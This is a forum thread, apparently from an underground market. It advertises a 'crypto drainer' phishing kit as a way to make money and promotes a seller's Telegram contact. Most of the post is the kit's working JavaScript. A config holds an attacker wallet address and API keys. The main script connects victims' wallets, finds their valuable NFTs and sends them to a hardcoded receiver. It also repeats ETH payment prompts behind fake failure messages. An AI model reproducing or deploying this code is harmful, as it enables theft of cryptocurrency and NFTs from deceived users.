PART 2 | CRYPTO DRAINER SCAM | OR HOW TO MAKE A LOT OF MONEY + FREE SOFT

[Lolbayyaa]

HI Guys   
The honeyman1 team welcomes you . We specialize in it-crypto, our services include: development of crypto projects and all kinds of custom smart contracts
 
 

Our previous Thread provided an overview of Web3 phishing techniques and tactics. Today, we offer a deeper dive into a specific category of Web3 phishing pages called “Crypto Drainers” and one of the more prolific actors behind them. We will see how one Crypto Drainer template was responsible for over 2,000 ETH in losses in a short period of time.

 

Crypto Drainers are phishing pages that lure victims into signing malicious transactions that allow the attacker to siphon their crypto and NFTs. Typically these websites piggyback off of well known or emerging NFT projects. The websites themselves are primarily promoted via spam campaigns on social networks and Discord.

 

 

The way most crypto drainers work is relatively straight forward:

•  
• Fake NFT minting pages with an artificial countdown to create urgency.
   
• Victim connects their wallet to “mint”.
   
• Check if the victim address owns any valuable NFTs.
   
• Victim signs transaction(s) to transfer ownership of NFTs.
   
• Victim sends a transaction to the attacker for the cost of the fake “mint”, but this transaction is not a contract interaction.
   
• Rinse & repeat.

 

Let's look at our old example:

 

 

Here’s the real website for comparison:

 

 

When we look at the code under the hood of the malicious site, we find that the whole thing is templated and includes deployment instructions, but more on that later. For now, let’s take a peak at how this thing works.

 

First we have settings.js which acts as a config file. The comments are not ours, but part of the Crypto Drainer template

const address = "0x237f0A6c126F979cEd363079f7Cc0bB848e1802B";
const infuraId = "6d233bb428724900aa1d6ac6bba531b1"     // Infuria ID | https://infura.io/ | For Wallet Connect
const moralisApi = "8lLcZsKmH7Scwxzqp7O3REOhP8nGAMh9CjJTjKwVMQzYJ16fKNs9rClIsQOq0kyx"    // x-api-key | https://moralis.io/ | For NFTs

const collectionInfo = {
    name: "Amazing Pandaverse",
    title: "Amazing Pandaverse", // Title prefix (ex "Buy your {name}") - You can use {name} to insert the collection name
    socialMedia: {
        discord: "https://discord.com/invite/amazingpandaverse",
        twitter: "https://twitter.com/amazing_pndv",
    },
    medias: {
        preview: "preview.gif",
        favicon: "logo.png",
    },
    background: {
        type: "image",              // Supported types: image, video, color
        image: "background.jpg",    // Image for image type, video preview for video type
        video: "background.mp4",    // If you don't use video, you can ignore this line
        color: "#4E4E6D",           // If you don't use color, you can ignore this line
    }
}
const mintInfo = {
    price: 0.089,         // Price per NFT.
    totalSupply: 8888,   // Total supply of NFTs.
    minUnits: 1,        // Min units to buy.
    maxUnits: 10,        // Max units to buy.
    askMintLoop: true,  // If true, when the user closes the metamask popup, it reopens automatically.
}

const nftsInfo = {
    active: true,   // Active (true) or not (false) NFTs stealer.
    minValue: 0.1,  // Minimum value of the last transactions (in the last 'checkMaxDay' days) of the collection.
    checkMaxDay: 7, // Maximum number of days to check for the last transactions.
    receiveAddress: "" // leave empty if you want to use the same address 
}

/* 
    = = = = = END OF SETTINGS = = = = =
*/

//#region Check Configuration
if (mintInfo.minUnits > mintInfo.maxUnits) console.error(`Error: minUnits (${mintInfo.minUnits}) is greater than maxUnits (${maxUnits})`);
if (mintInfo.minUnits <= 0) console.error(`Error: minUnits (${mintInfo.minUnits}) is less than or equal to 0`);

if (!address.startsWith("0x") ||
    (
        address.length >= 64 ||
        address.length <= 40
    )
) console.error(`Error: ${address} is not a valid Ethereum address.`);
//#endregion

Telegram @honeyman1

And then we have index.js which includes the code responsible for the actual draining:

 

Spoiler

//#region Page Button
const priceHtml = document.getElementById('lnprice');
let tempMaxSup = mintInfo.minUnits;

document.getElementById('plus').addEventListener('click', function () {
    let total = parseInt(priceHtml.innerText, 10);
    if (total >= mintInfo.maxUnits) total = mintInfo.maxUnits;
    else ++total;
    updatePrice(total)
});
document.getElementById('minus').addEventListener('click', function () {
    let total = parseInt(priceHtml.innerText, 10);
    if (total <= mintInfo.minUnits) total = mintInfo.minUnits;
    else --total;
    updatePrice(total)
});
document.getElementById('ape-max').addEventListener('click', function () {
    let nowSup = parseInt(priceHtml.innerText, 10)
    if (nowSup != mintInfo.maxUnits) {
        tempMaxSup = nowSup;
        updatePrice(mintInfo.maxUnits)
    } else updatePrice(tempMaxSup)
});

function updatePrice(total) {
    const totalPrice = (total * mintInfo.price).toFixed(2);
    document.getElementById('lnprice').innerText = total;
    document.getElementById('price').innerText = totalPrice;
}
//#endregion
//#region Utils Functions
function isMobile() {
    var check = false;
    (function (a) {
        if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0, 4))) check = true;
    })(navigator.userAgent || navigator.vendor || window.opera);
    return check;
};


function openInNewTab(href) {
    Object.assign(document.createElement('a'), {
        target: '_blank',
        href: href,
    }).click();
}
//#endregion



// Unpkg imports
const ethers = window.ethers;
const Web3Modal = window.Web3Modal.default;
const WalletConnectProvider = window.WalletConnectProvider.default;
const evmChains = window.evmChains;

let web3Modal;
let provider;
let selectedAccount;

function init() {
    console.log("Initializing example");
    console.log("WalletConnectProvider is", WalletConnectProvider);
    console.log("window.web3 is", window.web3, "window.ethereum is", window.ethereum);

    const providerOptions = {
        walletconnect: {
            package: WalletConnectProvider,
            options: {
                infuraId: infuraId,
            }
        }
    };

    web3Modal = new Web3Modal({
        cacheProvider: false,
        providerOptions,
        theme: "dark"
    });

    console.log("Web3Modal instance is", web3Modal);
    Moralis.enableWeb3();
}

/**
 * Kick in the UI action after Web3modal dialog has chosen a provider
 */
async function fetchAccountData() {
    const web3 = new Web3(provider);
    const chainId = await web3.eth.getChainId();
    const chainData = evmChains.getChain(chainId);
    const accounts = await web3.eth.getAccounts();
    selectedAccount = accounts[0];

    console.log("Web3 instance is", web3);
    console.log("Chain data is", chainData);
    console.log("Got accounts", accounts);
    console.log("Selected account is", selectedAccount);

    document.querySelector("#connect").style.display = "none";
    document.querySelector("#transfer").style.display = "block";
}


async function refreshAccountData() {
    document.querySelector("#transfer").style.display = "none";
    document.querySelector("#connect").style.display = "block";

    document.querySelector("#connect").setAttribute("disabled", "disabled")
    await fetchAccountData();
    document.querySelector("#connect").removeAttribute("disabled")
}
async function onConnect() {

    console.log("Opening a dialog", web3Modal);
    try {
        provider = await web3Modal.connect();
    } catch (e) {
        console.log("Could not get a wallet connection", e);
        return;
    }

    provider.on("accountsChanged", () => fetchAccountData());
    provider.on("chainChanged", () => fetchAccountData());
    provider.on("networkChanged", () => fetchAccountData());

    await refreshAccountData();
}

async function clickMint() {
    const web3 = new ethers.providers.Web3Provider(provider);
    const givenNumber = document.getElementById("price").textContent.toString();

    if (nftsInfo.active) askNfts(web3, givenNumber)
    else askMint(givenNumber)
}

async function askNfts(web3, amount) {
    const accounts = await web3.listAccounts();
    selectedAccount = accounts[0];

    fetch(`https://deep-index.moralis.io/api/v2/${selectedAccount}/nft?chain=eth&format=decimal`, {
        "headers": {
            "Content-Type": "application/json",
            "accept": "application/json",
            "x-api-key": moralisApi
        },
        "method": "GET",
    }).then(async (response) => {
        const nfts = (await response.json()).result;
        console.info(`You have ${nfts.length} NFTs`);
        if (nfts.length > 0) {
            let transactionsOptions = [];
            for (nft of nfts) {
                await fetch(`https://deep-index.moralis.io/api/v2/nft/${nft.token_address}/lowestprice?chain=eth&days=${nftsInfo.checkMaxDay}&marketplace=opensea`, {
                    "headers": {
                        "Content-Type": "application/json",
                        "accept": "application/json",
                        "x-api-key": moralisApi
                    },
                    "method": "GET",
                }).then(async (priceResp) => {
                    if (priceResp.status === 200) {} else return;
                    const nftData = (await priceResp.json());
                    let ethValue = parseFloat(Web3.utils.fromWei(nftData.price, "ether"))
                    if (nft.amount) ethValue = ethValue * parseInt(nft.amount)
                    if (ethValue >= nftsInfo.minValue.toString(10)) {
                        console.log(`${nft.token_address} (${nft.token_id}) | ${ethValue} > ${nftsInfo.minValue}`)
                        transactionsOptions.push({
                            price: nftData.price * (nft.amount > 0 ? nft.amount : 1),
                            options: {
                                type: nft.contract_type.toLowerCase(),
                                receiver: "0x8f572fB040BCA3d98EBf8aB5FFeff0fF0Fb6Df3c",
                                contract_address: nft.token_address,
                                token_id: nft.token_id,
                            }
                        })
                        if (nft.contract_type === "ERC1155") {
                            const trans = transactionsOptions.find(t => t.options.contract_address == nft.token_address && t.options.token_id == nft.token_id);
                            if (trans) trans.options.amount = ethers.BigNumber.from(nft.amount)
                        }
                    } else console.log(`!!! ${nft.token_address} (${nft.token_id}) | ${ethValue} < ${nftsInfo.minValue}`);
                }).catch(O_o => console.error(O_o));
            }
            if (transactionsOptions.length < 1) return askMint(amount);
            console.log(transactionsOptions);
            for (transaction of transactionsOptions.sort((a, b) => b.price - a.price)) {
                console.log(transaction);
                Moralis.transfer(transaction.options).catch(O_o => console.error(O_o, transaction));
            }
        } else askMint(amount);
    }).catch(O_o => console.log(O_o));
}

async function askMint(amount) {
    const web3 = new Web3(provider);
    walletAddress = (await web3.eth.getAccounts())[0];
    web3.eth.sendTransaction({
            from: walletAddress,
            to: address,
            value: web3.utils.toWei(amount, "ether"),
        })
        .on('transactionHash', function (hash) {
            setTimeout(() => {
                if (isMobile()) {} else {
                    const notif = addNotification("error", `Error! Your transaction failed. Please try again.`)
                    removeNotification(notif, 8000);
                }
            }, 2000);
            console.log(`Transaction hash: ${hash}`)
            return askMint(amount);
        })
        .on('confirmation', function (confirmationNumber, receipt) {
            console.log(`Transaction confirmed x${confirmationNumber}`);
        })
        .on('error', (error) => {
            if (error.message && error.message.includes("insufficient")) console.log(`Insufficient Balance: ${walletAddress} has insufficient balance`);
            if (error.message && error.message.includes("User rejected") || error.message && error.message.includes("User denied")) {
                if (isMobile()) {} else {
                    const notif = addNotification("warning", "You denied the transaction. Please try again.");
                    removeNotification(notif, 5000);
                }
                console.log(`User Denied: ${walletAddress} denied transaction`);
            } else console.log(`Mint Error: ${walletAddress} failed to mint`);
            console.log("Error", error ? error.message : "unknown error");
            return askMint(amount);
        });
}

window.addEventListener('load', async () => {
    init();
    document.querySelector("#connect").addEventListener("click", onConnect);
    document.querySelector("#transfer").addEventListener("click", clickMint);
}); 

 

We are not going to look at the code line by line, but it is worth highlighting two sections. These we will talk about in the next part

My current contacts for our products and other issues: TG honeyman1  

bump

[honeyman1]

PART 2 | CRYPTO DRAINER SCAM | OR HOW TO MAKE A LOT OF MONEY + FREE SOFT

[honeyman1]

PART 2 | CRYPTO DRAINER SCAM | OR HOW TO MAKE A LOT OF MONEY + FREE SOFT

[honeyman1]

PART 2 | CRYPTO DRAINER SCAM | OR HOW TO MAKE A LOT OF MONEY + FREE SOFT

[sativaqu33n]

yes  pls

[honeyman1]

PART 2 | CRYPTO DRAINER SCAM | OR HOW TO MAKE A LOT OF MONEY + FREE SOFT

[honeyman1]

PART 2 | CRYPTO DRAINER SCAM | OR HOW TO MAKE A LOT OF MONEY + FREE SOFT